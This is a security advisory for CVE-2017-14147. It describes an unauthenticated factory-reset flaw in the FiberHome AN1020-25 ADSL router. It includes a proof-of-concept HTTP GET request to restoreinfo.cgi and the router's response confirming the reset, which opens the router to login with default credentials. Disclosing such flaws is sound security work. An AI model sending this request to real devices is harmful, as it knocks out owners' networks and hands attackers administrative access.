135 lines
No EOL
3.1 KiB
Text
135 lines
No EOL
3.1 KiB
Text
Title:
|
|
====
|
|
|
|
FiberHome Unauthenticated ADSL Router Factory Reset.
|
|
|
|
Credit:
|
|
======
|
|
|
|
Name: Ibad Shah
|
|
Twitter: @BeeFaauBee09
|
|
Website: beefaaubee09.github.io
|
|
|
|
|
|
CVE:
|
|
=====
|
|
|
|
CVE-2017-14147
|
|
|
|
Date:
|
|
====
|
|
|
|
05-09-2017 (dd/mm/yyyy)
|
|
|
|
About FiberHome:
|
|
======
|
|
|
|
FiberHome Technologies is a leading equipment vendor and global solution provider the field of information technology and telecommunications. FiberHome Deals in fiber-optic communications, data networking communications, wireless communication, and intelligentizing applications. In particular, it has been providing end-to-end solutions integrated with opto-electronic devices, opticpreforms, fiber & cables, and optical communication systems to many countries around the world.
|
|
|
|
Products & Services:
|
|
Wireless 3G/4G broadband devices
|
|
Custom engineered technologies
|
|
Broadband devices
|
|
|
|
URL : http://www.fiberhomegroup.com/
|
|
|
|
|
|
Description:
|
|
=======
|
|
|
|
This vulnerability in AN1020-25 router enables an anonymous unauthorized attacker to bypass authentication & access Resetting Router to Factory Settings, resulting in un-authorized operation & resetting it to Factory state. It later allows attacker to login to Router's Main Page with default username & password.
|
|
|
|
|
|
|
|
Affected Device Model:
|
|
=============
|
|
|
|
FiberHome ADSL AN1020-25
|
|
|
|
|
|
Exploitation-Technique:
|
|
===================
|
|
|
|
Remote
|
|
|
|
|
|
Details:
|
|
=======
|
|
|
|
Below listed vulnerability enables an anonymous unauthorized attacker to reset router to it's factory settings & further access router admin page with default credentials.
|
|
|
|
1) Bypass authentication and gain unauthorized access vulnerability - CVE-2017-14147
|
|
|
|
Vulnerable restoreinfo.cgi
|
|
|
|
|
|
|
|
Proof Of Concept:
|
|
================
|
|
|
|
PoC :
|
|
|
|
GET /restoreinfo.cgi HTTP/1.1
|
|
Host: 192.168.1.1
|
|
Upgrade-Insecure-Requests: 1
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
|
|
Accept-Encoding: gzip, deflate
|
|
Accept-Language: en-US,en;q=0.8
|
|
Connection: close
|
|
|
|
|
|
HTTP/1.1 200 Ok
|
|
Server: micro_httpd
|
|
Cache-Control: no-cache
|
|
Date: Sat, 01 Jan 2000 00:12:39 GMT
|
|
Content-Type: text/html
|
|
Connection: close
|
|
|
|
<html>
|
|
<head>
|
|
<meta HTTP-EQUIV='Pragma' CONTENT='no-cache'>
|
|
<link rel=stylesheet href='stylemain.css' type='text/css'>
|
|
<link rel=stylesheet href='colors.css' type='text/css'>
|
|
<script language="javascript">
|
|
<!-- hide
|
|
|
|
function restore() {
|
|
var enblPopWin = '0';
|
|
var loc = 'main.html';
|
|
var code = 'window.top.location="' + loc + '"';
|
|
|
|
if ( enblPopWin == '1' ) {
|
|
loc = 'index.html';
|
|
code = 'location="' + loc + '"';
|
|
}
|
|
|
|
eval(code);
|
|
}
|
|
|
|
function frmLoad() {
|
|
setTimeout("restore()", 60000);
|
|
}
|
|
|
|
// done hiding -->
|
|
</script>
|
|
</head>
|
|
|
|
<body onLoad='frmLoad()'>
|
|
<blockquote>
|
|
<b>DSL Router Restore</b><br><br>
|
|
The DSL Router configuration has been restored to default settings and the
|
|
router is rebooting.<br><br>
|
|
Close the DSL Router Configuration window and wait for 2 minutes before
|
|
reopening your web browser. If necessary, reconfigure your PC's IP address to
|
|
match your new configuration.
|
|
</blockquote>
|
|
</body>
|
|
</html>
|
|
|
|
|
|
|
|
Credits:
|
|
=======
|
|
|
|
Ibad Shah, Taimooor Zafar, Owais Mehtab |